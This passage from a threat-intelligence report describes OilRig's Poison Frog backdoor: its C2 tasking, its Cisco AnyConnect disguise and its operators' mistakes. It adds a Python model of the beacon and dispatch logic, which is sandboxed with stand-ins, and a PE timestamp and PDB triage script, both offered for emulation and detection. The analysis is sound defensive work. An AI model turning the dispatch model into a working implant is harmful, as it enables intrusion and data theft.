Now, depending on the last character of the saved reply, one of the following actions takes place:

  • ‘0’: the command specified in the reply is executed on the machine and the result is sent back to the C2;
  • ‘1’: the agent checks whether the file specified in the reply exists on the system. If it does not, a 404 is sent back; if it does, the file is sent to the server;
  • ‘2’: the file is saved on the system at the location specified in the reply.

And that’s it. All in 59 lines.
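An executable model of the check-in and tasking logic just described, added here as an example for building a C2 emulator or a network detection against; it is not the backdoor’s code. The marker string, the 11-character reply length, the ‘1’ and ‘3’ acknowledgements and the 0/1/2 dispatch come from the description above. The UID derivation (a truncated MD5 of the MAC or whoami string), the exact beacon framing (three random digits on either side of the marker-encapsulated UID) and the way a payload accompanies a reply are assumptions, and the in-memory C2, file system dict and command callback are stand-ins so that nothing is executed or written.

```python
"""Model of the Poison Frog HTTP agent's beacon and dispatch logic.  Added
example, not the backdoor's code: marker, reply length, '1'/'3' acks and the
0/1/2 dispatch are from the report; UID derivation, beacon framing and the
payload-per-reply model are assumptions."""
import hashlib
import random

MARKER = "24351243510"   # framing string from the report
REPLY_LEN = 11           # a task reply is exactly 11 characters


def make_uid(mac=None, whoami=None):
    """UID from the MAC address, else from whoami output (the hashing is an assumption)."""
    seed = mac or whoami
    if not seed:
        raise ValueError("need a MAC address or whoami output")
    return hashlib.md5(seed.encode()).hexdigest()[:8]


def frame_beacon(uid, rng=random):
    """Random digits on both sides of MARKER + uid + MARKER (assumed framing)."""
    return f"{rng.randint(100, 999)}{MARKER}{uid}{MARKER}{rng.randint(100, 999)}"


def parse_beacon(msg):
    """C2 or detection side: recover the UID between the two markers, or None."""
    first = msg.find(MARKER)
    if first < 0:
        return None
    start = first + len(MARKER)
    second = msg.find(MARKER, start)
    return msg[start:second] if second >= 0 else None


class FakeC2:
    """In-memory server: answers a valid beacon with one fixed reply, logs everything."""

    def __init__(self, reply, payload):
        self.reply, self.payload, self.received = reply, payload, []

    def exchange(self, msg):
        self.received.append(msg)
        return self.reply if parse_beacon(msg) else ""


def run_agent(c2, fs, uid, run_cmd, rng=random):
    """One check-in.  `fs` is a dict standing in for the file system and `run_cmd`
    a caller-supplied callable, so this model never executes or writes anything."""
    reply = c2.exchange(frame_beacon(uid, rng))
    if len(reply) != REPLY_LEN:
        return None                      # anything but an 11-character reply is ignored
    c2.exchange(reply + "1")             # acknowledge the task
    saved = reply                        # kept: its last character selects the action
    c2.exchange(saved + "3")             # second acknowledgement before acting
    kind = saved[-1]
    if kind == "0":                      # run a command and return its output
        result = run_cmd(c2.payload)
    elif kind == "1":                    # upload a file, or report 404 if it is missing
        result = fs.get(c2.payload, "404")
    elif kind == "2":                    # download: payload is (path, data)
        path, data = c2.payload
        fs[path] = data
        result = "saved"
    else:
        return kind, None                # unknown task type: nothing is done
    c2.exchange(saved + result)          # report back
    return kind, result


if __name__ == "__main__":
    c2 = FakeC2("TASK0000010", "whoami")
    print(run_agent(c2, {}, make_uid(mac="00:11:22:33:44:55"), lambda cmd: f"<output of {cmd}>"))
    print("C2 saw:", c2.received)
```

`parse_beacon` is the part worth lifting into a detection: the marker string is a fixed token in every check-in, so a proxy or IDS rule that looks for two occurrences of it with a short UID in between catches the beacon regardless of the random padding.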

Another sample we found is MD5 C9F16F0BE8C77F0170B9B6CE876ED7FB. It embeds one of the earliest versions of the DNS agent. In 335 lines of code it is able to execute commands on the system as well as save files to the system.

Poison Frog disguises

Installing malware on a system is not always easy. So the OilRig developers decided to pull a little trick and disguise the malware as the legitimate Cisco AnyConnect application. The backdoor is embedded in a similar way to that used in the samples above.

They made some small implementation mistakes, however. For example, the info popup appears every time you click on it, which doesn’t happen with the benign application.

The following message also helped fool users – it appeared when the connect button was clicked:

This may lead users to think there is something wrong with the application or their internet access, though in reality the backdoor is being silently installed on the system.

OilRig’s sloppiness

OilRig is not the most advanced APT actor, and it has made several small mistakes in the course of its activities.

For example, one sample failed to execute properly because of a typo (note the ‘Poweeershell.exe’ instead of ‘Powershell.exe’):

Also, many samples still had the PDB path inside the binary:

With other samples, they changed the compilation date to a future date – one that was after its release. For instance, one sample – 87FB0C1E0DE46177390DE3EE18608B21 – has a compilation date of 2018-07-25, though we found it on our systems a year earlier.
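Both artefacts mentioned above, the leftover PDB path and the implausible build timestamp, can be pulled out of a PE image with the standard library alone. The following is an added triage example, not the report’s tooling: it reads the COFF TimeDateStamp, compares it with the date the sample was first seen, and scans for CodeView RSDS records (signature, 16-byte GUID, 4-byte age, NUL-terminated path) instead of walking the debug directory, which is a shortcut that survives a damaged section table. The minimal PE byte layout, the PDB path and the 2017-08-01 first-seen date are constructed; only the 2018-07-25 build date is from the text.

```python
"""Build timestamp and PDB path triage for a PE image, standard library only.
Added example, not the report's tooling; the PE byte layout, the PDB path and
the first-seen date below are constructed."""
import struct
from datetime import datetime, timezone


def coff_timestamp(pe):
    """TimeDateStamp from the COFF file header, as a Unix epoch integer."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # COFF header after the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    return struct.unpack_from("<I", pe, e_lfanew + 8)[0]


def build_time_iso(pe):
    return datetime.fromtimestamp(coff_timestamp(pe), tz=timezone.utc).isoformat()


def timestamp_anomaly(pe, first_seen_epoch):
    """True when the claimed build time is later than the sample's first sighting."""
    return coff_timestamp(pe) > first_seen_epoch


def rsds_pdb_paths(pe):
    """Every CodeView record: 'RSDS' + 16-byte GUID + 4-byte age + NUL-terminated path.
    Scanning for the signature is a triage shortcut; it does not validate the
    debug directory, so treat hits as leads rather than proof."""
    paths, pos = [], pe.find(b"RSDS")
    while pos >= 0:
        start = pos + 4 + 16 + 4
        end = pe.find(b"\0", start)
        if end > start:
            paths.append(pe[start:end].decode("latin-1"))
        pos = pe.find(b"RSDS", pos + 4)
    return paths


def build_sample_pe(timestamp, pdb_path):
    """Constructed: the smallest byte layout the parsers above need (not a loadable PE)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                   # e_lfanew: right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 0, 0x102)
    codeview = b"RSDS" + b"\x11" * 16 + struct.pack("<I", 1) + pdb_path.encode() + b"\0"
    return bytes(dos) + b"PE\0\0" + coff + codeview


# Constructed: a 2018-07-25 build stamp on a sample "first seen" on 2017-08-01.
SAMPLE_PE = build_sample_pe(1532476800, r"C:\Users\dev\agent\obj\Release\agent.pdb")
FIRST_SEEN_EPOCH = 1501545600

if __name__ == "__main__":
    print("build time:", build_time_iso(SAMPLE_PE))
    print("pdb paths:", rsds_pdb_paths(SAMPLE_PE))
    print("timestamp after first sighting:", timestamp_anomaly(SAMPLE_PE, FIRST_SEEN_EPOCH))
```

For a real sample, pass the file bytes and the first-seen time from your own telemetry or a sandbox submission record; a build time later than the first sighting is either a deliberately altered stamp, as here, or a reproducible-build convention, so check which before treating it as an attribution clue.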

For more details and the latest information on OilRig, please contact [email protected]

